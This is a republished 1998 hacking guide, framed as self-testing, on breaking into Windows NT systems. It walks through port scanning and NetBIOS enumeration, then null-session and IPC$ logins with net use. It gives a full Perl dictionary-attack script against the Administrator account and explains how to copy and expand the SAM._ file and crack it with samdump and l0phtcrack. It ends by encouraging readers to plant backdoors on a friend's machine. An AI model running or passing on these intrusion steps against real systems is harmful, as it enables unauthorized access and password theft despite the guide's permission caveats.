How to Break into Windows NT: Improving the security of your site by breaking into it, the NT version


Published: Oct 16, 2002 Updated: Oct 16, 2002 Section: Network Security Library :: Harmless hacking book Author: Company: WindowSecurity.com Printable Version Adjust font size: Rating: 4/5 - 56 Votes 1 2 3 4 5

GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 10 Part 1 How to Break into Windows NT ____________________________________________________________ by keydet89@yahoo.com "Improving the security of your site by breaking into it, the NT version" The purpose of this article is to illustrate to NT users (and sysadmins) how to test and verify the security of their own system or site by breaking into it, using the techniques that an attacker would use. Further, this guide assumes that you are using NT to test an NT system...the Win95 versions of the commands used in this guide aren't as powerful as the NT versions. *********************************************************** YOU COULD GO TO JAIL WARNING: Gaining unauthorized access to computers is against the law...read the GTMHH files on computer crime and the law. If you want to try out some or all of the techniques presented here, make sure that you get permission. *********************************************************** In 1993, Dan Farmer and Wietse Venema wrote a paper called "Improving the security of your site by breaking into it." This paper took the view of "what better way to test your computer and network security of your site than by breaking into it." This is a good view to take...try using "hacker" techniques to break into your site to see how vulnerable you are. The paper in question can be found at: http://www.trouble.org/security. A good place to start for reference is a previous GTMHH entitled "NT Security - Locking down the system". This guide discusses some of the steps that need to be taken to secure an NT workstation or standalone server. The guide also contains links to files that contain more in-depth information and explanations, as well as information particular to sysadmins. In review of the previous guide, some "light" reading: Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt Vacuum's NT Exploits document at http://207.89.195.250/texts/ NeonSurge's documents at http://207.89.195.250/texts/ Santeria Systems' "Hardening NT" document at http://pw2.netcom.com/~honeyluv/index.html Most of the techniques outlined in this guide are meant to be run against the local system, by using the IP address assigned by your ISP. However, it's more fun to get with your friends, and connect your systems to the Internet. Then meet at one location, and try these techniques against your own systems. The methods described in this guide are intended to be exercises for the reader. [The Remote Attack] In order to protect your system from outside attack, you need to think like an attacker. What does an attacker want with your system? Access...it's all about access. Regardless of the motives or ultimate goals, an attacker wants access. Preferably, root/admin access...the attacker wants to gain administrator access to your system, or "own" your system. So to ensure that your system is secure, you need to "attack" it the way the attacker would. To begin with, you need to see what the attacker sees. In order to find potentially vulnerable NT (or 95) systems, all you need to do is scan a range of IP addresses to see if port 139 is open. Port 139 is the "NetBIOS session" port, that is used in file and print sharing...which is potentially the most dangerous aspect of NT! To locate systems with port 139 active, get a port scanner like Sam Spade (http://www.blighty.com). Sam Spade lets you scan a range of IP addresses for a single port. Try running whichever port scanner you use against your own system. ******************************************************************** NEWBIE NOTE: Finding a system with port 139 open does not auto- matically mean that the target system is 95 or NT. Un*x and Linux systems run SAMBA, which allows them to share file "the Microsoft way". However, the focus of this guide is NT, so we'll leave SAMBA for another day. ******************************************************************** Okay, so you've run a port scanner against your own system and found port 139 open. The next step is to run the "nbtstat" command against your own system: c:\>nbtstat -A [ipaddr] NOTE: Make sure you use the capital "A", and the IP address assigned by your ISP when you dial in. To see the IP address that you were assigned, type "ipconfig /all" at the command prompt. This will return the NetBIOS Name Table of your system. The files mentioned above from the Rhino9 site (http://207.89.195.250/texts/) go into more detail regarding what everything in the table refers to, but what we (and the attacker) are interested in are the hex codes in the center column of the table. If you see a code '<20>', this means that your system is advertising that it has shares available. The scary thing is that these shares are potentially avialable via the Internet!! I say "potentially" because we haven't checked yet. Okay, if you haven't seen the '<20>' code, then you can be relatively sure that you are safe, to some degree. Just remember, as long as a computer is turned on, and especially when it's connected to the Internet, there is no such thing as 100% security. If you do see the '<20>' code, then the next step is to gather a little information about our system. To do that, we need to go to: http://www.ntsecurity.com/ and get a copy of the RedButton program. RedButton is a nifty little proof-of-concept program to show that it is possible to log onto an NT system without presenting a username or password. The NTSecurity.com site (http://www.ntsecurity.com/RedButton/default.htm) describes the RedButton program. Run the program against your own system, and see what type of information is available. You will see any available shares, to include any hidden admin shares (ie, shares that end in "$". By default, there are several of these shares available...C$, WINNT$, IPC$, etc). The next step is to attempt to log into your system by using the "net" command. To do this, you need to attempt to connect to the "IPC$" share, which is one of default, hidden shares that is part of the NT installation. Attempting to make this connection is best done from a remote machine, preferably a friend's NT system. Attempt the connection by typing: c:\>net use \\[ipaddr]\ipc$ ******************************************************************** NEWBIE NOTE: The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that...if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in...it's recorded as a failed login attempt. The concept of the IPC$ share is covered in greater detail in Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT Exploits document at http://207.89.195.250/texts/. ******************************************************************** When this connection is attempted, the currently logged on username and password from the local system are sent for authentication. If you are logged on as "Administrator", this may not be a problem, and only password guesses will be required. If you (rather foolishly) use a "null" password (ie, don't use a password at all), then logging in is a trivial matter. You may laugh, but you would be surprised at the number of NT systems that don't have a password for the Administrator account. The 'net' command can also be run using username and password guesses: c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user: This command will either fail, or be completed successfully...the command will not pause waiting for further input, such as a password. That makes this syntax very easy to add to scripts and batch files. NAT (a program available from http://www.secnet.com) will automate these attempts, based on user-configurable files. NAT can be used in conjunction with dictionary files and wordlists to attack specific user accounts, such as Administrator. If you have changed the name of the Administrator account, as suggested by Microsoft and various professinal security consulting firms, you can still use RedButton to determine what that new name is and attack it. Download a copy of NAT (you can get versions of NAT for 95/NT or Linux) and try running it against either your system or your buddy's system. The downside of NAT is that when given two files, it tries the first username and all of the passwords in the password list, before moving on to the second username. NAT can be configured to some degree but you can also use tools such as Perl to configure this "dictionary attack" to your own tastes. You can create a Perl script that includes the following command: open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user: | "); ******************************************************************** NEWBIE NOTE: Perl is a great programming language to learn on your way to other languages, such as C or Java. It's an interpretted language, like Java, but much faster than Java. Also, just about every Un*x sysadmin knows how to program in Perl. Fortunately, there is a version of Perl available for 95 and NT at http://www.activestate.com . There is also a wealth of reference material and examples of Perl scripts available from http://www.perl.com. ******************************************************************** The following Perl script can be used to conduct a dictionary attack against your own system or a friend's system (with his permission, of course): ----- begin script ----- # ipcchk.plx by Keydet89 # script to take names from a text file, and attempt to # complete the IPC$ connection using the name as both the # username and password # successful connections are logged to the log file # no checking of arguments is provided, user must enter a # valid IP address for the target server # # usage: c:\>perl ipcchk.plx [ipaddr] open(TEST, "names.txt") || die "Could not open file."; open(LOG,">>ipc.log") || die "Could not open log."; if (length($ARGV[0]) == 0) { print "Usage: perl ipcchk.plx [ipaddr]"; exit(0); } $server = ARGV[0]; while() { $name = $_; chop($name); # print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n"; open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | "); while() { if (grep(/successfully/,$_)) { print LOG "$server accepts connections for password $name\n"; # delete a successful connection to avoid multiple connections to # the same machine open(DEL, "net use \\\\$server\\ipc\$ /d | "); } } ----- end script ----- This script is easily configurable, and can be run on a system with Perl for Win32 installed. For information on installing Perl for Win32 on your 95 or NT system, see: http://reference.perl.com/query.cgi?windows Minor modifications to this script will allow you to conduct a similar attack against other accounts on your system. The IPC$ share is the key to compromising an NT server. It is only following a successful connection that the real work toward exploiting this vulnerability can be done. This is especially true if you've gained access via the Administrator account, or an account in the Administrator group. Once you have successfully completed an IPC$ connection to your buddy's machine, you can then try to see if he has any shares available using the 'net' command: c:\>net view \\[ipaddr] Depending upon how your friend set up his machine, there may or may not be shares available. If shares are available, you can attempt to connect to them using the 'net' command: c:\>net use x: \\[ipaddr]\[share] If this command doesn't work the first time, don't worry. You can follow the same steps as above to attempt a dictionary attack. You shouldn't need to, however...if you gained access to your friend's machine via the Administrator account. But you're not safe just because you haven't specifically made shares available yourself. Even if the C:\ drive itself isn't specifically shared on the server, you still have access to it as the C$ share if the IPC$ connection leads to Administrator access. Once the connection to the IPC$ share is successfully completed, the next command to attempt is: c:\>net use g: \\xxx.xxx.xxx.xxx\c$ ******************************************************************* NEWBIE NOTE: Notice this command is a little different from the earlier version of the "net use" command. In this case, the "c$" share is a physical disk on the target server, so you need to assign it a device name on your local machine. To see the syntax for this command, enter "net use /?" at the command prompt. ******************************************************************* Once you've gained access to the C$ share you, type: c:\>dir g: /p to view the contents of your friend's C:\ drive. If you have successfully completed the IPC$ connection, you can do other things besides access 'hidden' (as in 'not anymore!!') shares. Once your friend creates an account for you and places it in the Administrator group, log in via the IPC$ connection. Then click Start -> Run, and type 'regedit'. Choose Registry -> Connect Network Registry..., and type the IP address of your friend's machine into the dialogue box. Wait a minute, and you will be able to view parts of his Registry. [Password Cracking] If you gain access to the system (I should say 'your' system), then there are several things you can do. Let's say you've gone after /etc/passwd files on Un*x systems...how would you do this on an NT system? NT keeps user passwords in SAM (Security Accounts Manager) file. When a system is turned on, you generally can't access this file, especially if you are a regular user (ie, not Administrator). However, in the c:\winnt\repair directory, you will see a file called "SAM._". This is the compressed version of the SAM database that is created when the system is installed, and updated whenever the rdisk utility is run. Users have the ability to read (and copy) this file. Note: The next exercise is intended to be run on your own machine. However, once you have access to a friend's computer and connected to the C$ share (shown above), you can get a copy of the SAM._ file from his machine by typing: c:\>copy g:\winnt\repair\sam._ So let's have a little fun. First, create several user accounts in User Manager, using blank or easily guessable passwords...words from the dictionary, etc. You can use these accounts to either try breaking into your system, or provide valid accounts to your friends so that only they can log in. After you've created the accounts, have a couple of blank, formatted diskettes available, and type: c:\>rdisk /s Follow the instructions that appear in the windows. When you're done, go to the c:\winnt\repair directory, and copy the "SAM._" file to another directory (for the purposes of this exercise, c:\temp). Now type: c:\temp>expand SAM._ sam Now pass the file through SAMDump (you can find SAMDump at http://www.nmrc.org/files/snt/index.html) in order to put the file in a format that is usable by a password cracker: c:\temp>samdump sam > samfile You now have a usable "samfile". Now you just need to run a password cracker, such as l0phtcrack (from either http://www.l0pht.com or http://www.nmrc.org/files/snt/index.html) or NTCrack (from either http://www.secnet.com or http://www.nmrc.org/files/snt/index.html) Once you gain access to your friend's computer, you can leave little backdoors and practical jokes...if your friend has a sense of humor. Coming next GTMHH: WinNT Back Doors and Pracitcal Jokes! _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ Carolyn Meinel M/B Research -- The Technology Brokers http://techbroker.com